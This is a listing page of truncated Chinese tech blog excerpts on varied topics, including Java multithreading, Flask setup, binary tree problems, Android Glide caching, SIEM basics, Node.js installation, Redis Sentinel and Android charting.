阅读本文之前可以看一看 Java 多线程基础&#xff1a; Java&#xff1a;多线程&#xff08;进程线程&#xff0c;线程状态&#xff0c;创建线程&#xff0c;线程操作&#xff09; Java&#xff1a;多线程&#xff08;同步死锁&#xff0c;锁&原子变量&#xff0c;线程通信&…

Flask学习之项目搭建

一、项目基本结构 1、 exts.py 存在的目的&#xff1a;在Python中&#xff0c;如果两个或更多模块(文件)相互导入对方&#xff0c;就会形成导入循环。例如&#xff0c;模块A导入了模块B&#xff0c;同时模块B又导入了模块A&#xff0c;这就会导致导入循环。 比如在这个项目中…

[数据结构] 二叉树题目(一)

目录 一.翻转二叉树 1.1 题目 1.2 示例 1.3 分析 1.4 解决 ​编辑 二. 相同的树 2.1 题目 2.2 示例 2.3 分析 2.4 解决 三. 对称二叉树 3.1 题目 3.2 示例 3.3 分析 3.4 解决 一.翻转二叉树. - 力扣&#xff08;LeetCode&#xff09; 1.1 题目 1.2 示例 1.3 分…

Android Glide(一):源码分析,内存缓存和磁盘缓存的分析,实现流程以及生命周期

目录 一、Android Glide是什么&#xff0c;如何使用&#xff1f; Android Glide是一个由Google维护的快速高效的Android图像加载库&#xff0c;它旨在简化在Android应用程序中加载和显示图像的过程&#xff0c;包括内存缓存、磁盘缓存和网络加载&#xff0c;以确保图像加载的快…

java日志门面之JCL和SLF4J

文章目录 前言一、JCL1、JCL简介2、快速入门3、 JCL原理 二、SLF4J1、SLF4J简介2、快速入门2.1、输出动态信息2.2、异常信息的处理 3、绑定日志的实现3.1、slf4j实现slf4j-simple和logback3.2、slf4j绑定适配器实现log4j3.2、Slf4j注解 4、桥接旧的日志框架4.1、log4j日志重构为…

【高景一号卫星】

高景一号卫星 高景一号卫星是中国自主研发的一系列高分辨率商业遥感卫星&#xff0c;旨在满足全球民用遥感影像市场的需求。以下是对高景一号卫星的详细介绍&#xff1a; 一、基本信息 名称&#xff1a;高景一号&#xff08;SuperView-1, SV-1&#xff09;发射时间&#xf…

C++入门基础知识87(实例)——实例12【判断闰年】

成长路上不孤单&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a;&#x1f60a; 【14后&#x1f60a;///C爱好者&#x1f60a;///持续分享所学&#x1f60a;///如有需要欢迎收藏转发///&#x1f60a;】 今日分享关于判断闰年的相关内容&#xff01; 关于【…

什么是托管安全信息和事件管理 SIEM?

什么是 SIEM&#xff1f; 安全信息和事件管理 ( SIEM ) 解决方案最初是一种集中式日志聚合解决方案。SIEM 解决方案会从整个组织网络中的系统收集日志数据&#xff0c;使组织能够从单一集中位置监控其网络。 随着时间的推移&#xff0c;SIEM解决方案已发展成为一个完整的威胁…

【裸机装机系列】16.kali(ubuntu)-安装linux和win双系统-重装win11步骤

推荐阅读&#xff1a; 1.kali(ubuntu)-为什么弃用ubuntu&#xff0c;而选择基于debian的kali操作系统 注意&#xff1a; 要先装windows&#xff0c;再装linux&#xff0c;不然linux的启动分区会被覆盖掉。为什么双系统要先装windows呢&#xff1f; 在一个新硬盘上&#xff0…

node.js npm 安装和安装create-next-app -windowsserver12

1、官网下载windows版本NODE.JS https://nodejs.org/dist/v20.17.0/node-v20.17.0-x64.msi 2、安装后增加两个文件夹目录node_global、node_cache npm config set prefix "C:\Program Files\nodejs\node_global" npm config set prefix "C:\Program Files\nod…

Android PopupWindow.showAsDropDown报错:BadTokenException: Unable to add window

Android PopupWindow.showAsDropDown报错&#xff1a;BadTokenException: Unable to add window Android PopupWindow.showAsDropDown报错&#xff1a; android.view.WindowManager$BadTokenException: Unable to add window -- token null is not valid; is your activity ru…

vue-实现rtmp直播流

1、安装vue-video-player与videojs-flash npm install vue-video-player -S npm install videojs-flash --save 2、在main.js中引入 3、组件中使用 这样就能实现rtmp直播流在浏览器中播放&#xff0c;但有以下几点切记&#xff0c;不要入坑 1.安装vue-video-player插件一定…

读数据湖仓02数据抽象

1. 不同类型的数据 1.1. 不同类型的数据在存储方面有各自的特性&#xff0c;这些特性极大地影响了数据在数据湖仓中的存储和使用方式 1.2. 结构化数据 1.2.1. 在企业等组织中&#xff0c;只有少量的数据是结构化数据 1.2.2. 结构化数据是基于事务的数据&#xff0c;是组织日…

[Redis][哨兵][下]详细讲解

目录 1.安装部署(基于Docker)1.编排Redis主从节点2.编排Redis-Sentinel节点 2.重新选举1.redis-master宕机之后2.redis-master重启之后3.总结 3.选举原理4.总结 1.安装部署(基于Docker) 1.编排Redis主从节点 编写docker-compose.yml 创建/root/redis/docker-compose.yml&…

【项目文档】软件系统培训方案(Doc原件2024)

1. 培训概述 2. 培训目的 3. 培训对象及要求 3.1. 培训对象 3.2. 培训人员基本要求 4. 培训方式 5. 培训内容 6. 培训讲师 7. 培训教材 8. 培训质量保证 8.1. 用户培训确认报告 8.2. 培训疑问解答 软件全套资料部分文档清单&#xff1a; 工作安排任务书&#xff0c;可行性分析报…

JS对不同浏览器的检测问题

Navigator对象也称浏览器对象&#xff0c;该对象包含了浏览器的整体信息&#xff0c;如浏览器名称&#xff0c;版本号等。Navigator对象由Navigator浏览器率先使用&#xff0c;后来各方浏览器都开始支持Navigator对象&#xff0c;逐步成为一种标准。 一、Navigator对象的属性 …

自动化check是不是测试?

这篇文章是reddit上关于质量保障讨论的比较多的帖子&#xff0c;我把它转为中文版&#xff0c;供大家交流学习&#xff0c;由于直接用的翻译软件以及截图&#xff0c;大家凑合看下哈。 自动化检查并不是真正的“测试”&#xff1f;编写自动化检查确实很重要——但编写自动化测…

Android开发MPAndroidChart两条折线图

Android开发MPAndroidChart两条折线图 Android开发两条折线图效果&#xff0c;还是有一定难度的&#xff0c;难点它的起点不是坐标0的开始&#xff0c;还有数值上有背景图 一、思路&#xff1a; 用的是MPAndroidChart的BarChart 二、效果图&#xff1a; 三、关键代码&#…